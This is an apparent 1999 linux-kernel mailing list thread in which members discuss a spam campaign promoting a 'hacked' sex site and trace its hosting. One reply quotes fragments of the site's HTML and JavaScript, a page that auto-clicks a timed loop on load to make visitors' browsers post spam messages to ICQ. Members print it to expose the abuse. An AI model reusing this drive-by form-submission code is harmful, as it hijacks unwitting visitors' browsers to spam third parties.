14 sl-smartt-1-0-0-T3.sprintlink.net (22.214.171.124) 289.606 ms 218.194
ms 219.797 ms
15 blackhat-T1.austtx.ixcis.net (126.96.36.199) 359.599 ms 228.010 ms
16 sex.interactwithme.com (188.8.131.52) 229.419 ms 238.185 ms
Don't rant, protect the week and destroy the evil :) (if worst come to
worst that's only a t1)
On Tue, 16 Nov 1999, Rick Franchuk wrote:
> > On Tue, 16 Nov 1999, Michael H. Warfield wrote:
> > > Oh shit... This thing is making the rounds again!
> > >
> > > On Wed, Nov 17, 1999 at 03:03:35AM +1100, BRYANTR@vax.sonoma.edu wrote:
> > > > here is the site you wanted... http://SEX.Interactwithme.com it's the one that gives you free membership access (all hacked) to abotu 300 membership based sex sites. k bye...
> > > > ps: why r u using vger.rutgers.edu now? it doens't make sence, anyway *bye*...
> > >
> > > Warning... This is NOT spam.
> > Another warning: The sender of this SPAM is using its recipients in the
> > From: field, as well. At least two of the messages so far were sent from
> > my addresses.
> > The people in the From: field are valid addresses, but not at all
> > responsible for whatever is happening. (I know - two people already
> > complained to my sysadmin about having received the message from me).
> > If there's a lawyer on this list, I wonder if there's anything we can do
> > about that.
> I've dug around the html (manually reconstructed some of the oddball URLs)
> on this guy's site... here's a page that's undoubtably causing people some
> // About the email being sent...
> sentFrom= "Sex Hacker"; //your name
> fromEmail="firstname.lastname@example.org"; //your email
> theSubject= "Hacked XXX Sites!!"; //subject line
> <body onLoad=document.stats.sendLoop.click()>
> <form action=http://wwp.icq.com/scripts/WWPMsg.dll method=post target=output>
> <input type=text name=from value=EliteHacker size=30 maxlength=40><br>
> <input type=text name=fromemail value="email@example.com" size=30 maxlength=40><br>
> <input type=text name=subject value=HackedSexSites size=30 maxlength=30><br>
> <textarea name=body rows=10 cols=55 wrap=Virtual>
> ACCESS about 100 XXX sites for free! Hacked by elite hackers! No banners, no
> credit cards, no membership and no bullshit, go to
> http://SEX.InteractWithMe.com you get direct membership access to the best
> sex sites in the world NO CATCH. Go NOW to http://SEX.InteractWithMe.com
> <input type=text name=to value= size=30 maxlength=20><br>
> <input type=SUBMIT name=Send value=SendOnlyOneMessage>
> <form name=stats>
> <input type=button name=stop value=stop onClick=clearInterval(vcRunnerTimer);>
> <input type=button name=sendLoop value=SendLoop onClick=vcRunnerTimer=setInterval('sender()',1000);>
> attempted... <input type=text name=number size=7>
> ... does the area in 'textarea' look familiar? This particular page 'forces'
> passers by to spam ICQ numbers (hence the UIN and the action pointing at
> wwq.icq.com). I don't doubt that this guy has cobbled together a few
> different pages and he cycles through 'em randomly, so that each visitor
> spams out a new message, some via email, some via ICQ, etc.
> This guy needs a lawyer to slap his pee-pee, hard. FWIW, he seems to be
> getting his service from ixcis.net.
> | |
> | Rick Franchuk - TranSpecT Consulting |
> |______ ______|
> - mailto:firstname.lastname@example.org -
> To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
> the body of a message to email@example.com
> Please read the FAQ at http://www.tux.org/lkml/
<>< As a computer I find your faith in technology amusing.
- To unsubscribe from this list: send the line "unsubscribe linux-kernel" in the body of a message to firstname.lastname@example.org Please read the FAQ at http://www.tux.org/lkml/